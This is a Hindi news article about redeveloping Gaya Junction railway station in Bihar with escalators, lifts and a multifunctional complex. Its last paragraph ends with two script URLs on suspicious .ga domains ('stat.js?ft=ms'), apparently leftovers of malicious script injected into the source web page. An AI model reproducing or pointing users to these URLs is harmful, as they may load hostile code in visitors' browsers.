बिहारवासियों को राज्य में पहली बार एयरपोर्ट जैसी सुविधाएं एक जिले से शुरुआत होने जा रही है। क्योकि अब रेल भूमि विकास प्राधिकरण द्वारा रेलवे स्टेशन को विश्वस्तरीय बनाने की दिशा में कार्य शुरू कर दिया गया है। पूर्व मध्य रेल के गया जंक्शन सहित कुल पांच स्टेशनों पर विश्वस्तरीय यात्री सुविधाएं मुहैया करायी जाएंगी। रेल भूमि विकास प्राधिकरण द्वारा स्टेशनों के पुनर्विकास से जुड़े ये कार्य पीपीपी (पब्लिक प्राईवेट पार्टनरशिप) मोड पर पूरे किए जाएंगे। रेलवे के इस कदम से यात्री सुविधाओं के विकास में काफी गति आएगी।

बिहार के गया जिले के रेलवे स्टेशन को विश्वस्तरीय रूप देते हुए एवं स्टेशनों को अत्याधुनिक सुविधा से सुसज्जित करते हुए स्टेशन को ग्रीन बिल्डिंग का रूप दिया जाने की तयारी हो रही है, जहां वेंटिलेशन आदि की पर्याप्त व्यवस्था रहेगी। सभी श्रेणी के रेल यात्रियों के स्टेशन पर आगमन एवं प्रस्थान के लिए अलग-अलग व्यवस्था होगी। साथ ही प्रवेश और निकास द्वार ऐसे बनाये जायेंगे, जिससे यात्रियों को भीड़-भाड़ का सामना बिलकुल नहीं करना पड़े।

साथ साथ प्रत्येक प्लेटफार्म पर एस्केलेटर एवं लिफ्ट लगाए जाएंगे, ताकि एक प्लेटफार्म से दूसरे प्लेटफार्म पर आने-जाने में यात्रियों को किसी प्रकार की असुविधा नहीं हो। इससे वरिष्ठ नागरिक एवं दिव्यांग व्यक्तियों को विशेष रूप से फायदा मिलेगा। प्रत्येक प्लेटफॉर्म पर लिफ्ट और एस्केलेटर, प्लेटफॉर्मो के ऊपर पर्याप्त भीड़ नहीं हो, आवश्यक सुविधाएं, खानपान, वॉशरूम, पीने का पानी, एटीएम, इंटरनेट आदि शामिल होंगे।

गया जंक्शन के खाली पड़े बाहरी परिसर में रेलवे लैंड डेवलपमेंट ऑथोरिटी के द्वारा एक मल्टीफंशनल कॉप्लेक्स बनाया जा चूका है। साथ साथ मल्टीफंशनल कॉप्लेक्स 30 करोड़ से निर्माण कराई गई है, एवं जिनमें 90 वातानुकूलित कमरे भी बनाए गए हैं। साथ ही शॉपिंग मॉल बनाया गया है, जो फिलहाल पूरी तरह से खाली है। सिर्फ एक होटल निजी कंपनी के द्वारा चलाया जा रहा है। साथ ही प्लेटफॉर्म की सफाई की व्यवस्था,पार्किंग व्यवस्था,शौचालय की व्यवस्था,रेलवे पूछताछ काउंटर सहित अन्य कार्य निजी कंपनियों के द्वारा किया जा रहा है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.